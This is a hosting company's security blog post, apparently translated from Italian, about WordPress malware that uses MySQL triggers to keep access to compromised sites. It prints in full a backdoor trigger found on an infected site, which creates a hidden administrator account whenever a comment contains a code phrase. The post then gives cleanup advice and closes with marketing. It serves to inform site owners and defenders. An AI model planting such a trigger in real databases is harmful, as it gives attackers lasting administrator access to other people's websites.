December 1 2022

Malware and Backdoor on WordPress using TRIGGER MySQL

How hackers keep access to our WordPress installation using a MySQL backdoor

Over the past year, there has been an increasing trend of WordPress malware using SQL triggers to hide malicious SQL queries inside compromised databases. These queries insert an administrator-level user into the infected database whenever the trigger condition is met.

What makes this especially problematic for website owners is that most malware cleaning guides focus on website files and data within specific database tables, for example wp_users , wp_options e wp_posts.

If you use a popular CMS on your website (like WordPress), chances are you use a MySQL databases for storing important data such as CMS settings and content (e.g. WordPress posts). This means that anything that can modify the MySQL database can also cause serious damage to the website, such as injecting malicious content or even deleting the content of your website.

This security risk is one of the reasons why the MySQL database is assigned a separate username and password (see the wp-config.php ): This feature prevents someone from remotely querying the MySQL database without the proper login information.

Since WordPress has access to your login information via wp-config.php , is able to read and make changes to the database defined within the configuration file.

Unfortunately, after attackers gain unauthenticated access, they can often read the file wp-config.php to learn login information for the website's database, which can then be used by the attacker's malware to connect to the database and make malicious changes.

SQL triggers

Un sql triggers is a stored procedure that runs automatically when specific changes are made to the database.

Il trigger, in databases, is a procedure that is automatically performed when a specific event occurs, such as the cancellation of a record of a table. This provides a technique for specifying and maintaining even complex integrity constraints. Triggers allow users to specify more complex integrity constraints since a trigger is essentially a PL/SQL (Oracle) procedure, Transact-SQL, etc.

This procedure is therefore associated with a table and is automatically called by the database engine when a certain change (or event) occurs within the table. Changes on the table can include operations INSERTUpdate, and delete.

While they have many useful applications, we also have evidence that SQL triggers are used by malicious actors to maintain unauthorized access after a compromise. To do this, attackers insert an SQL trigger into a compromised website's database, and when specific criteria are met or an event occurs, the malicious stored action is executed.

For example, we found this interesting backdoor SQL trigger in the table wp_comments on the database of an infected website:

/*!50003 CREATE*/ /*!50017 DEFINER=`root_ext`@`%`*/ /*!50003 TRIGGER `after_insert_comment` AFTER INSERT ON `meccanicainnovativa`.`wp_comments` FOR EACH ROW BEGIN IF NEW.comment_content LIKE ' %are you struggling to get comments on your blog?%' THEN SET @lastInsertWpUsersId = (SELECT MAX(id) FROM `meccanicainnovativa`.`wp_users`); SET @nextWpUsersID = @lastInsertWpUsersId + 1; INSERT INTO `meccanicainnovativa`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwaoGJxViPhtGdNG5UZs1', 'wpadmin', '', '', '2014-06-08 00:00 :00', '', '0', 'Kris'); INSERT INTO `meccanicainnovativa`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator \";s:1:\"1\";}'); INSERT INTO `meccanicainnovativa`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10'); END IF; END */;;

This SQL trigger creates a malicious admin user whenever a new comment containing the code words ” are you struggling to get comments on your blog? ' is sent on the infected WordPress website.

The trigger checks the column comment_content in the database wp_comments , so it doesn't matter if the comment is approved or pending. Once the SQL trigger is active, it inserts a malicious admin user wpadmin with counterfeit recording date 2014-06-08 and email address wp-security@hotmail [ com

Conclusion and mitigation steps

When a website has been compromised, you can bet that attackers will be looking for any database credentials found in wp-config or other CMS configuration files, and it can be incredibly difficult to identify whether the hacker collected this information at any point post-infection.

If If a compromise occurs, passwords must be updated throughout the environment, including the databases. Neglecting this post-hack step can lead to an attacker accessing and modifying your site even after you thought you had cleaned the infection.

If you doubt that your site may have a backdoor of this type, just export the database via a .sql dump and search the string TRIGGER inside the exported file.

Obviously not all TRIGGERs are backdoors, as we said before TRIGGERs are useful and legitimate tools; however, it is also true that using TRIGGER within WordPress installations is something very rare and highly unusual.

Hacked website owners can refer to our service on how to clean a hacked website for steps to clean up the infection. If you need a hand, we can help you clean up any malware and backdoors and secure your site.

Do you have doubts? Don't know where to start? Contact us!

We have all the answers to your questions to help you make the right choice.

Chat with us

Chat directly with our presales support.


Contact us by phone during office hours 9:30 - 19:30

Contact us online

Open a request directly in the contact area.


Managed Server Srl is a leading Italian player in providing advanced GNU/Linux system solutions oriented towards high performance. With a low-cost and predictable subscription model, we ensure that our customers have access to advanced technologies in hosting, dedicated servers and cloud services. In addition to this, we offer systems consultancy on Linux systems and specialized maintenance in DBMS, IT Security, Cloud and much more. We stand out for our expertise in hosting leading Open Source CMS such as WordPress, WooCommerce, Drupal, Prestashop, Joomla, OpenCart and Magento, supported by a high-level support and consultancy service suitable for Public Administration, SMEs and any size.

Red Hat, Inc. owns the rights to Red Hat®, RHEL®, RedHat Linux®, and CentOS®; AlmaLinux™ is a trademark of AlmaLinux OS Foundation; Rocky Linux® is a registered trademark of the Rocky Linux Foundation; SUSE® is a registered trademark of SUSE LLC; Canonical Ltd. owns the rights to Ubuntu®; Software in the Public Interest, Inc. holds the rights to Debian®; Linus Torvalds holds the rights to Linux®; FreeBSD® is a registered trademark of The FreeBSD Foundation; NetBSD® is a registered trademark of The NetBSD Foundation; OpenBSD® is a registered trademark of Theo de Raadt. Oracle Corporation owns the rights to Oracle®, MySQL®, and MyRocks®; Percona® is a registered trademark of Percona LLC; MariaDB® is a registered trademark of MariaDB Corporation Ab; REDIS® is a registered trademark of Redis Labs Ltd. F5 Networks, Inc. owns the rights to NGINX® and NGINX Plus®; Varnish® is a registered trademark of Varnish Software AB. Adobe Inc. holds the rights to Magento®; PrestaShop® is a registered trademark of PrestaShop SA; OpenCart® is a registered trademark of OpenCart Limited. Automattic Inc. owns the rights to WordPress®, WooCommerce®, and JetPack®; Open Source Matters, Inc. owns the rights to Joomla®; Dries Buytaert holds the rights to Drupal®. Amazon Web Services, Inc. holds the rights to AWS®; Google LLC holds the rights to Google Cloud™ and Chrome™; Microsoft Corporation holds the rights to Microsoft®, Azure®, and Internet Explorer®; Mozilla Foundation owns the rights to Firefox®. Apache® is a registered trademark of The Apache Software Foundation; PHP® is a registered trademark of the PHP Group. CloudFlare® is a registered trademark of Cloudflare, Inc.; NETSCOUT® is a registered trademark of NETSCOUT Systems Inc.; ElasticSearch®, LogStash®, and Kibana® are registered trademarks of Elastic NV Hetzner Online GmbH owns the rights to Hetzner®; OVHcloud is a registered trademark of OVH Groupe SAS; cPanel®, LLC owns the rights to cPanel®; Plesk® is a registered trademark of Plesk International GmbH; Facebook, Inc. owns the rights to Facebook®. This site is not affiliated, sponsored or otherwise associated with any of the entities mentioned above and does not represent any of these entities in any way. All rights to the brands and product names mentioned are the property of their respective copyright holders. Any other trademarks mentioned belong to their registrants. MANAGED SERVER® is a trademark registered at European level by MANAGED SERVER SRL, Via Enzo Ferrari, 9, 62012 Civitanova Marche (MC), Italy.


Would you like to see how your WooCommerce runs on our systems without having to migrate anything? 

Enter the address of your WooCommerce site and you will get a navigable demonstration, without having to do absolutely anything and completely free.

No thanks, my customers prefer the slow site.
Back to top